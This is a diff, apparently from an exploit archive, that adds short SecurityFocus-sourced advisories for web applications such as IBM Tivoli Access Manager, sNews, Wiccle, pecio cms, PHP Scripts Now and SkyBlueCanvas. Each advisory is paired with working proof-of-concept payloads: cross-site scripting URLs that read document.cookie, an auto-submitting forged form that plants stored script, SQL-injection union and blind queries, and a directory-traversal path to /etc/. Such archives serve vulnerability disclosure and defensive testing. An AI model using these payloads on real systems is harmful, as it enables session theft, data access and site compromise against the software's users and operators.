+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+       
+IBM Tivoli Access Manager for e-business 6.1.0 is vulnerable
+
+http://www.example.com/ibm/wpm/pop?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E

platforms/multiple/webapps/34915.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44382/info
+        
+IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+        
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+        
+IBM Tivoli Access Manager for e-business 6.1.0 is vulnerable
+
+http://www.example.com/ibm/wpm/rule?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E

platforms/multiple/webapps/34916.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44382/info
+         
+IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+         
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+         
+IBM Tivoli Access Manager for e-business 6.1.0 is vulnerable
+
+http://www.example.com/ibm/wpm/user?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E

platforms/multiple/webapps/34917.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44382/info
+          
+IBM Tivoli Access Manager for e-business is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+          
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+          
+IBM Tivoli Access Manager for e-business 6.1.0 is vulnerable
+
+http://www.example.com/ibm/wpm/webseal?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E 

platforms/php/webapps/34888.html

@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/44255/info
-
-sNews is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
-
-Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
-
-sNews 1.7 is vulnerable; other versions may also be affected. 
-
-<form action="http://www.example.com/?action=process&task=save_settings" method="post" name="main" > <input type="hidden" name="website_title" value='sNews 1.7"><script>alert(document.cookie)</script>'> <input type="hidden" name="home_sef" value="home"> <input type="hidden" name="website_description" value="sNews CMS"> <input type="hidden" name="website_keywords" value="snews"> <input type="hidden" name="website_email" value="info@mydomain.com"> <input type="hidden" name="contact_subject" value="Contact Form"> <input type="hidden" name="language" value="EN"> <input type="hidden" name="charset" value="UTF-8"> <input type="hidden" name="date_format" value="d.m.Y.+H:i"> <input type="hidden" name="article_limit" value="3"> <input type="hidden" name="rss_limit" value="5"> <input type="hidden" name="display_page" value="0"> <input type="hidden" name="num_categories" value="on"> <input type="hidden" name="file_ext" value="phps,php,txt,inc,htm,html"> <input type="hidden" name="allowed_file" value="php,htm,html,txt,inc,css,js,swf"> <input type="hidden" name="allowed_img" value="gif,jpg,jpeg,png"> <input type="hidden" name="comment_repost_timer" value="20"> <input type="hidden" name="comments_order" value="ASC"> <input type="hidden" name="comment_limit" value="30"> <input type="hidden" name="word_filter_file" value=""> <input type="hidden" name="word_filter_change" value=""> <input type="hidden" name="save" value="Save"> </form> <script> document.main.submit(); </script> <form action="http://www.example.com/?action=process&task=admin_article&id=2" method="post" name="main" > <input type="hidden" name="title" value="article title" /> <input type="hidden" name="seftitle" value="sefurl" /> <input type="hidden" name="text" value='article text"><script>alert(document.cookie)</script>' /> <input type="hidden" name="define_category" value="1" /> <input type="hidden" name="publish_article" value="on" /> <input type="hidden" name="position" value="1" /> <input type="hidden" name="description_meta" value="desc" /> <input type="hidden" name="keywords_meta" value="key" /> <input type="hidden" name="display_title" value="on" /> <input type="hidden" name="display_info" value="on" /> <input type="hidden" name="fposting_day" value="29" /> <input type="hidden" name="fposting_month" value="9" /> <input type="hidden" name="fposting_year" value="2010" /> <input type="hidden" name="fposting_hour" value="16" /> <input type="hidden" name="fposting_minute" value="40" /> <input type="hidden" name="task" value="admin_article" /> <input type="hidden" name="edit_article" value="Edit" /> <input type="hidden" name="article_category" value="1" /> <input type="hidden" name="id" value="2" /> </form> <script> document.main.submit(); </script> 

platforms/php/webapps/34888.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44273/info
+
+UloKI PHP Forum is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+http://www.example.com/forum/search.php?term="><script>alert(document.cookie);</script>
+UloKI PHP Forum 2.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/forum/search.php?term="><script>alert(document.cookie);</script>

platforms/php/webapps/34890.txt

@@ -0,0 +1,49 @@
+source: http://www.securityfocus.com/bid/44295/info
+
+Wiccle Web Builder CMS and iWiccle CMS Community Builder are prone to multiple cross-site scripting vulnerabilities because they fail to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/wwb_101/index.php?module=articles&show=post_search&post_text=<script>alert('XSS-Test')</script> 
+
+http://www.example.com/iwiccle_1211/index.php?module=articles&show=post_search&post_text=<script>alert('XSS-Test')</script> 
+
+http://www.example.com/wwb_101/index.php?module=blogs&show=post_search&post_text=<script>alert('XSS-Test')</script> 
+
+http://www.example.com/iwiccle_1211/index.php?module=blogs&show=post_search&post_text=<script>alert('XSS-Test')</script>
+
+http://www.example.com/wwb_101/index.php?module=gallery&show=post_search&post_text=<script>alert('XSS-Test')</script> 
+
+http://www.example.com/iwiccle_1211/index.php?module=gallery&show=post_search&post_text=<script>alert('XSS-Test')</script> 
+
+http://www.example.com/wwb_101/index.php?module=news&show=post_search&post_text=<script>alert('XSS-Test')</script> 
+
+http://www.example.com/iwiccle_1211/index.php?module=news&show=post_search&post_text=<script>alert('XSS-Test')</script> 
+
+http://www.example.com/wwb_101/index.php?module=store&show=post_search&post_text=<script>alert('XSS-Test')</script> 
+
+http://www.example.com/wwb_101/index.php?module=video&show=post_search&post_text=<script>alert('XSS-Test')</script> 
+
+http://www.example.com/iwiccle_1211/index.php?module=video&show=post_search&post_text=<script>alert('XSS-Test')</script> 
+
+http://www.example.com/wwb_101/index.php?module=links&show=post_search&post_text=<script>alert('XSS-Test')</script> 
+
+http://www.example.com/iwiccle_1211/index.php?module=links&show=post_search&post_text=<script>alert('XSS-Test')</script> 
+
+http://www.example.com/wwb_101/index.php?module=events&show=post_search&post_text=<script>alert('XSS-Test')</script> 
+
+http://www.example.com/iwiccle_1211/index.php?index.php?module=events&show=post_search&post_text=<script>alert('XSS-Test')</script> 
+
+http://www.example.com/wwb_101/index.php?module=downloads&show=post_search&post_text=<script>alert('XSS-Test')</script> 
+
+http://www.example.com/wwb_101/index.php?module=guestbook&show=post_search&post_text=<script>alert('XSS-Test')</script> 
+
+http://www.example.com/wwb_101/index.php?module=help&show=post_search&post_text=<script>alert('XSS-Test')</script> 
+
+http://www.example.com/wwb_101/index.php?module=notebox&show=post_search&post_text=<script>alert('XSS-Test')</script> 
+
+http://www.example.com/wwb_101/index.php?module=polls&show=post_search&post_text=<script>alert('XSS-Test')</script> 
+
+http://www.example.com/wwb_101/index.php?module=portfolio&show=post_search&post_text=<script>alert('XSS-Test')</script> 
+
+http://www.example.com/wwb_101/index.php?module=support&show=post_search&post_text=<script>alert('XSS-Test')</script>

platforms/php/webapps/34891.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/44300/info
+
+Micro CMS is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Micro CMS 1.0 beta 1 is vulnerable; other versions may also be affected.
+
+</legend><script> alert(&#039;XSS-Test&#039;)</script> <!--
+</legend><script> alert(&#039;XSS-Test&#039;)</script>
+<script> alert(&#039;XSS-Test&#039;)</script>

platforms/php/webapps/34892.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44304/info
+
+pecio cms is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+pecio cms 2.0.5 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/pecio/index.php?target=search&term=<script>alert(&#039;XSS-Test&#039;)</script>

platforms/php/webapps/34893.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/44306/info
+
+Multiple PHP Scripts Now products are prone to an input-validation vulnerability that can be exploited to conduct SQL-injection and cross-site scripting attacks.
+
+Exploiting this vulnerability could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The following products are affected:
+
+PHP Scripts Now President Bios
+PHP Scripts Now World's Tallest Buildings 
+
+http://www.example.com/tallestbuildings/bios.php?rank=%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E
+http://www.example.com/presidents/bios.php?rank=%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E

platforms/php/webapps/34894.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/44306/info
+ 
+Multiple PHP Scripts Now products are prone to an input-validation vulnerability that can be exploited to conduct SQL-injection and cross-site scripting attacks.
+ 
+Exploiting this vulnerability could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+The following products are affected:
+ 
+PHP Scripts Now President Bios
+PHP Scripts Now World's Tallest Buildings 
+
+http://www.example.com/tallestbuildings/bios.php?rank=1+and+1=null+union+select+1,version(),3,4,5,6,7,8,9--
+http://www.example.com/presidents/bios.php?rank=-1%20union%20all%20select%201,version(),3,4,5,6,7,8,9,10%20from%20presidents

platforms/php/webapps/34902.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/44309/info
+
+PHP Scripts Now Riddles is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/results.php?searchquery=1<script>alert(308297104532)</script>&search=Search

platforms/php/webapps/34903.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/44309/info
+ 
+PHP Scripts Now Riddles is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+ 
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+http://www.example.com/list.php?pagenum=0&catid=4+AND%20SUBSTRING(@@version,1,1)=5 TRUE
+http://www.example.com/list.php?pagenum=0&catid=4+AND%20SUBSTRING(@@version,1,1)=4 FALSE

platforms/php/webapps/34904.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44316/info
+
+Radvision Scopia is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to Radvision SD 7.0.100 are vulnerable. 
+
+http://www.example.com/scopia/entry/index.jsp?page=play%3c%2fsCrIpT%3e%3csCrIpT%3ealert("document.cookie")%3c%2fsCrIpT%3e

platforms/php/webapps/34905.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/44370/info
+
+w-Agora is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks.
+
+The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+w-Agora 4.2.1 and prior are vulnerable. 
+
+http://www.example.com/news/search.php3?bn=..\1 http://www.example.com/news/search.php3?bn=..\1 

platforms/php/webapps/34906.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/44370/info
+ 
+w-Agora is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+ 
+An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks.
+ 
+The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+ 
+w-Agora 4.2.1 and prior are vulnerable. 
+
+http://www.example.com/news/search.php3?bn=[xss]

platforms/php/webapps/34919.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44397/info
+
+SkyBlueCanvas is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue requires administrative privileges and may allow an attacker to obtain sensitive information that could aid in further attacks.
+
+SkyBlueCanvas 1.1 r237 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/skybluecanvas/admin.php?mgrou=pictures&mgr=media&dir=../../../../../../../etc/